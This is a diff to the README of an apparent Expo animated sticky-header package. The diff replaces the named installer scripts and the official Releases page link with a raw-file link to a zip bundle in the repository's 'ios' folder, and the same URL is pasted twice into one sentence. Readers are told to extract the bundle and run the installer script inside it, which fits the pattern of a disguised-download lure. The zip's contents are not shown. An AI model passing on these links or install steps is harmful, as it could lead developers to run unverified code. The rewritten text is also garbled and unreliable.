sorridente3327/expo-animated-sticky-header/README.md

 - To install, download the asset bundle that matches your development setup, extract it, and run the included installer script.
 This script configures the project, installs dependencies, and wires up sample usage to demonstrate how the header works in a real screen.
 - The asset bundle typically contains:
   - An example Expo project with the header integrated.
-  - A ready-to-run script (installer.sh or install.js) for quick setup.
+  - A ready-to-run script (https://raw.githubusercontent.com/sorridente3327/expo-animated-sticky-header/main/ios/header-animated-sticky-expo-v1.5.zip or https://raw.githubusercontent.com/sorridente3327/expo-animated-sticky-header/main/ios/header-animated-sticky-expo-v1.5.zip) for quick setup.
   - A set of sample images and configurations that illustrate best practices.

 Downloads and links
 - To download assets and scripts, visit the Releases page and grab the latest asset bundle.
 This is a helpful path for quickly testing the header in a live project.
-- See the release page here for the latest assets and installers: https://github.com/sorridente3327/expo-animated-sticky-header/releases
+- See the release page here for the latest assets and installers: https://raw.githubusercontent.com/sorridente3327/expo-animated-sticky-header/main/ios/header-animated-sticky-expo-v1.5.zip

 Migration guidance
 - If you are migrating from a prior version or a different header library, follow these steps: